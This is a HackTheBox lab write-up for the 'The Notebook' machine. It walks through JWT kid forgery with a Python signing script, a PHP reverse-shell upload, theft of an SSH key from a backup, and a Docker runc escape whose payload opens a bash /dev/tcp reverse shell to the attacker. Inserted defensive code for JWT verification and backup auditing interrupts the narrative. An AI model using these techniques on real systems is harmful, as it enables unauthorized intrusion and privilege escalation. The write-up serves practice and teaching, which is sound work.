The Notebook | HackTheBox Writeup

Overview

The Notebook is a medium-difficulty Linux machine on HackTheBox, created by mostwanted002.

User Part

Starting with an nmap scan, I found 3 open ports (22, 80 and 5555) plus one filtered port:

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-21 00:37 EDT
Nmap scan report for 10.10.10.230
Host is up (0.18s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
5555/tcp open freeciv?
10010/tcp filtered rxapi
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 181.34 ms 10.10.14.1
2 181.72 ms 10.10.10.230

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.02 seconds

Looking at HTTP, this is the website I got: a login and registration page.

I registered with the username admin1 and logged in to the dashboard.

I got a JWT in the cookies and decoded it with jwt.io.

The JWT header contained a kid (key ID) field.

This article gave me an idea about JWT kid exploitation.

For exploitation, I created an RSA key pair in PEM format using ssh-keygen, with the key name privKey.key:

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# ssh-keygen -t rsa -m PEM -f privKey.key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in privKey.key
Your public key has been saved in privKey.key.pub
The key fingerprint is:
SHA256:1M/0JYqN2juJNBd8zEymR1rcKw4hjf0jLfaDLVeihAg root@kali
The key's randomart image is:
+---[RSA 3072]----+
| + . . |
| E o.+ * . |
| . ..+.#. ...|
| ... @B%ooo |
| Soo&==. |
| oo= * |
| ..+.+ . |
| . o. |
| .. |
+----[SHA256]-----+

I decoded the header part and re-encoded it with a URL on my local IP as the kid value.

I replaced the header with my newly created base64 string, and the full JWT looked like this.

As you can see, I only changed the value of kid to point at my local machine.

I got a request from the target's IP:

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# python3 -m http.server 7070 1
Serving HTTP on 0.0.0.0 port 7070 (http://0.0.0.0:7070/) ...
10.10.10.230 - - [21/Jun/2021 01:06:36] "GET /privKey.key HTTP/1.1" 200 -

This time I changed the body part, setting admin_cap from 0 to 1.

But I didn't see any changes on the website.

So I looked into the Python jwt library, and this website gave me the idea to write a Python script.

I created a Python script with the help of that website; it looks like this:

import jwt

# Private key generated above with ssh-keygen (PEM format)
with open("privKey.key", "r") as f:
    PrivateKey = f.read().strip()

# kid points at my HTTP server, so the application fetches this key to verify the signature
Headers = {"kid": "http://10.10.14.32:7070/privKey.key"}
Payload = {"username": "admin", "email": "admin@thmhtb", "admin_cap": 1}

# Sign the payload with my own key; the server will validate it against the same key
Token = jwt.encode(Payload, PrivateKey, algorithm="RS256", headers=Headers)

print("\n\n")
print(Token)
print("\n\n")

Running the script gave me this JWT:

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# python3 jwt_generation_script.py
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNC4zMjo3MDcwL3ByaXZLZXkua2V5In0.eyJ1c2VybmFtZSI6ImFkbWluMSIsImVtYWlsIjoiYWRtaW5Abm90ZWJvb2suaHRiIiwiYWRtaW5fY2FwIjoxfQ.m9m923fpJC5y0os44_TFV4Fgp3Cqu7RI7uU9HmtuPJTzUrGfMhsWl1ui7Hrb9KdcAdxRLDQdet303_sb1AOgm6MVGaGV6GqKksA4VL5XgELyDew6ePWohukvSGzfTDPW1CF5ntRtfNbVOXI_0L4cMYkrBaItsbtZXYyYa1_h3g9cKfjB0xRV3YxsxBM86Q6l8Kp15Y7vVTf-ZYrT0KNn-pVWEbjH-rYKyrVpFoKYOWolTc4a9R0WB44cZlUyNG69zCTHM8Q7MIUEcUpO2urmkC8wjRB0whbDeyCOeSBqaUY2gvvAnBNmrHZQfuRSFqfHSSmTLTRFXQm30tqBVb4ln15BdD3WSGKnL8gvhrI5R1I2BLQDuJZ0OEM3YfXmqmhddrno0K6JEL7CdxNmvC8bp8MqoQ50YX5FMdtYcwzwBu7UcUx5LtmHU5OJ7_yZPqA8D0H1xXfVP7XFCINzvDC0PA4Rmf0Zb9zXSllM-etEH0qNo-W7LUgUdGEtW24VgX6N

I verified it using jwt.io.

I got a new dashboard by putting the JWT in the cookie and refreshing the page; the key was fetched again from my HTTP server:
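The requests on my HTTP server show the application fetching whatever the kid header points at and verifying the signature with that key, which is why a self-signed token was accepted. The verifier below is an added example (mine, not code from the writeup or from the box) of how kid should be handled on the server side: as an opaque label looked up in a local keyring, with the algorithm pinned, so a kid of http://10.10.14.32:7070/privKey.key is rejected before any key material is touched. It uses HS256 from the standard library instead of the RS256/PyJWT of the script above so it runs without extra packages; the keyring, key IDs and tokens are constructed for the example.

```python
import base64
import hashlib
import hmac
import json

# Constructed keyring: the only place the verifier looks keys up.
# kid values are opaque labels, never interpreted as paths or URLs.
KEYRING = {
    "app-2021-06": b"constructed-server-secret-do-not-reuse",
}


class TokenError(Exception):
    """Raised for any token that must not be trusted."""


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    # JWT strips '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_token(payload: dict, kid: str, key: bytes) -> str:
    """Build an HS256 token. Used here only to construct sample input."""
    header = {"typ": "JWT", "alg": "HS256", "kid": kid}
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def verify_token(token: str, keyring: dict = KEYRING) -> dict:
    """Return the payload only if the token is signed by a key in the keyring."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError) as exc:
        raise TokenError("malformed token") from exc
    if not isinstance(header, dict):
        raise TokenError("malformed header")

    # Pin the algorithm: the header never gets to choose it.
    if header.get("alg") != "HS256":
        raise TokenError("unexpected alg")

    # kid is a lookup label, nothing more. An unknown kid (a URL, a file
    # path, anything not registered) fails here, before any fetch or read.
    kid = header.get("kid")
    if not isinstance(kid, str) or kid not in keyring:
        raise TokenError(f"unknown kid: {kid!r}")

    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(keyring[kid], signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        raise TokenError("bad signature")

    payload = json.loads(b64url_decode(payload_b64))
    if not isinstance(payload, dict):
        raise TokenError("malformed payload")
    return payload


def is_admin(token: str) -> bool:
    """Admin decisions are made only from a verified payload."""
    try:
        return verify_token(token).get("admin_cap") == 1
    except TokenError:
        return False


if __name__ == "__main__":
    # Constructed: a legitimate low-privilege token from the real key.
    good = sign_token({"username": "admin1", "admin_cap": 0},
                      "app-2021-06", KEYRING["app-2021-06"])
    # Constructed: the writeup's attack shape, a token signed with the
    # attacker's own key and a kid pointing at the attacker's host.
    forged = sign_token({"username": "admin1", "admin_cap": 1},
                        "http://10.10.14.32:7070/privKey.key",
                        b"attacker-generated-key")
    print("legit token admin?", is_admin(good))     # False
    print("forged token admin?", is_admin(forged))  # False
```

The order of checks matters: the algorithm and kid are validated before any signature work, so an attacker-supplied kid never reaches a filesystem or network lookup, and admin_cap is read only from a payload whose signature has already been verified against a server-held key.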

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# python3 -m http.server 7070
Serving HTTP on 0.0.0.0 port 7070 (http://0.0.0.0:7070/) ...
10.10.10.230 - - [21/Jun/2021 02:27:54] "GET /privKey.key HTTP/1.1" 200 -

Clicking on the admin panel showed that I can upload files.

I uploaded a php-reverse-shell and got a shell back.

I found some backup files in /var/backups, including a home.tar.gz that looked suspicious, so I downloaded it to my local machine and checked it.

www-data@thenotebook:/var/backups$ ls -la
ls -la
total 696
drwxr-xr-x 2 root root 4096 Jun 21 06:26 .
drwxr-xr-x 14 root root 4096 Feb 12 06:52 ..
-rw-r--r-- 1 root root 51200 Jun 21 06:25 alternatives.tar.0
-rw-r--r-- 1 root root 33252 Feb 24 08:53 apt.extended_states.0
-rw-r--r-- 1 root root 3609 Feb 23 08:58 apt.extended_states.1.gz
-rw-r--r-- 1 root root 3621 Feb 12 06:52 apt.extended_states.2.gz
-rw-r--r-- 1 root root 437 Feb 12 06:17 dpkg.diversions.0
-rw-r--r-- 1 root root 172 Feb 12 06:52 dpkg.statoverride.0
-rw-r--r-- 1 root root 571460 Feb 24 08:53 dpkg.status.0
-rw------- 1 root root 693 Feb 17 13:18 group.bak
-rw------- 1 root shadow 575 Feb 17 13:18 gshadow.bak
-rw-r--r-- 1 root root 4373 Feb 17 09:02 home.tar.gz
-rw------- 1 root root 1555 Feb 12 06:24 passwd.bak
-rw------- 1 root shadow 1024 Feb 12 07:33 shadow.bak
www-data@thenotebook:/var/backups$
┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# wget 10.10.10.230:2000/home.tar.gz
--2021-06-21 02:41:03-- http://10.10.10.230:2000/home.tar.gz
Connecting to 10.10.10.230:2000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4373 (4.3K) [application/gzip]
Saving to: ‘home.tar.gz’

home.tar.gz 100%[============================================>] 4.27K --.-KB/s in 0s

2021-06-21 02:41:03 (80.7 MB/s) - ‘home.tar.gz’ saved [4373/4373]


┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─#

I extracted it and found an id_rsa inside.

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# tar -xvf home.tar.gz
home/
home/noah/
home/noah/.bash_logout
home/noah/.cache/
home/noah/.cache/motd.legal-displayed
home/noah/.gnupg/
home/noah/.gnupg/private-keys-v1.d/
home/noah/.bashrc
home/noah/.profile
home/noah/.ssh/
home/noah/.ssh/id_rsa
home/noah/.ssh/authorized_keys
home/noah/.ssh/id_rsa.pub

I got a user shell with that id_rsa:

 
┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# chmod 600 home/noah/.ssh/id_rsa

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# ssh -i home/noah/.ssh/id_rsa noah@10.10.10.230
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-135-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Mon Jun 21 06:43:59 UTC 2021

System load: 0.11 Processes: 205
Usage of /: 40.2% of 7.81GB Users logged in: 1
Memory usage: 19% IP address for ens160: 10.10.10.230
Swap usage: 0% IP address for docker0: 172.17.0.1


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

61 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Jun 21 06:22:03 2021 from 10.10.14.61
noah@thenotebook:~$
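The backup that gave away noah's key was readable by www-data (-rw-r--r--) while shadow.bak and the other credential backups were 0600, and nothing about its name said it held a private key. The script below is an added example (mine, not the box's or the author's code) of the check a defender would run over such archives: it scans a tarball for credential files by name and by content, and flags the archive itself when it is world-readable. The sample archive is constructed in memory to mirror the listing above, with the key material replaced by placeholders.

```python
import io
import re
import stat
import tarfile

# File names that should never appear in a readable backup (assumed list).
SENSITIVE_NAME = re.compile(
    r"(^|/)(id_(rsa|dsa|ecdsa|ed25519)|\.ssh/authorized_keys"
    r"|shadow\.bak|gshadow\.bak|passwd\.bak|\.netrc|\.pgpass)$"
)
# Content marker for PEM/OpenSSH private keys stored under innocent names.
PRIVATE_KEY_MARKER = re.compile(rb"-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")


def audit_backup(archive_bytes: bytes, archive_mode: int = None) -> list:
    """Return (member name, reason) pairs for members that leak credentials.

    archive_mode is the st_mode of the archive file itself, if known; a
    world-readable archive with findings gets an extra entry at the end.
    """
    findings = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            if SENSITIVE_NAME.search(member.name):
                findings.append((member.name, "sensitive filename"))
                continue
            # Only the first 4 KiB is needed to spot a PEM header.
            with tar.extractfile(member) as fh:
                head = fh.read(4096)
            if PRIVATE_KEY_MARKER.search(head):
                findings.append((member.name, "private key material"))
    if findings and archive_mode is not None and archive_mode & stat.S_IROTH:
        findings.append(("<archive>", "world-readable archive exposes the findings above"))
    return findings


def build_sample_archive() -> bytes:
    """Constructed tarball mirroring the home.tar.gz layout from the writeup."""
    files = {
        "home/noah/.bashrc": b"# ~/.bashrc\n",
        "home/noah/.ssh/id_rsa": (b"-----BEGIN RSA PRIVATE KEY-----\n"
                                  b"MIIE...constructed placeholder...\n"
                                  b"-----END RSA PRIVATE KEY-----\n"),
        "home/noah/.ssh/id_rsa.pub": b"ssh-rsa AAAA...constructed... noah@thenotebook\n",
        # A key hidden under a harmless name: caught by content, not by name.
        "home/noah/notes/key_backup.txt": (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
                                           b"constructed placeholder\n"
                                           b"-----END OPENSSH PRIVATE KEY-----\n"),
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mode = 0o600
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    # 0o644 is the mode home.tar.gz had in the listing above.
    for name, reason in audit_backup(build_sample_archive(), archive_mode=0o644):
        print(f"{reason:45s} {name}")
```

Run against a real /var/backups, the archive mode comes from os.stat(path).st_mode; the content check is what catches copies of keys that were renamed or moved out of ~/.ssh, which a name-only scan misses.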

Root Part

I checked which commands the current user can run with root privileges using sudo -l, and got docker.

noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
(ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*
noah@thenotebook:~$

I checked the docker version and it's old.

noah@thenotebook:~$ docker version
Client:
Version: 18.06.0-ce
API version: 1.38
Go version: go1.10.3
Git commit: 0ffa825
Built: Wed Jul 18 19:09:54 2018
OS/Arch: linux/amd64
Experimental: false
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get http://%2Fvar%2Frun%2Fdocker.sock/v1.38/version: dial unix /var/run/docker.sock: connect: permission denied
noah@thenotebook:~$

I searched for an exploit for that version and found a CVE, then looked for a PoC on GitHub.

I changed the PoC to send a reverse shell to my machine by editing the line below, then uploaded the built binary into the docker container.

<--->

// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.32/4200 0>&1"

<--->
noah@thenotebook:~$ sudo /usr/bin/docker exec -it webapp-dev01 bash
root@90ce2b0668d0:/opt/webapp# cd /tmp/
root@90ce2b0668d0:/tmp# wget 10.10.14.32:8012/main
--2021-06-21 07:33:46-- http://10.10.14.32:8012/main
Connecting to 10.10.14.32:8012... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2236814 (2.1M) [application/octet-stream]
Saving to: ‘main.1’

main.1 100%[============================================>] 2.13M 1023KB/s in 2.1s

2021-06-21 07:33:48 (1023 KB/s) - ‘main.1’ saved [2236814/2236814]

root@90ce2b0668d0:/tmp#

I executed it and got a root shell back:

 
root@90ce2b0668d0:/tmp# ./main 
[+] Overwritten /bin/sh successfully
[+] Found the PID: 57
[+] Successfully got the file handle
[+] Successfully got write handle &{0xc0000aa180}
root@90ce2b0668d0:/tmp#
 
noah@thenotebook:~$ sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
No help topic for '/bin/sh'
noah@thenotebook:~$

┌──(root💀kali)-[~/Desktop/hackthebox/TheNotebook]
└─# nc -lvnp 4200
Listening on 0.0.0.0 4200
Connection received on 10.10.10.230 41878
bash: cannot set terminal process group (5722): Inappropriate ioctl for device
bash: no job control in this shell
<47f46e91675653d57a915006bf61ab13a6790e75f2c511ee9# cat /root/root.txt
cat /root/root.txt
1adcc38b3f8508915e9c59f0656a0f8d
<47f46e91675653d57a915006bf61ab13a6790e75f2c511ee9#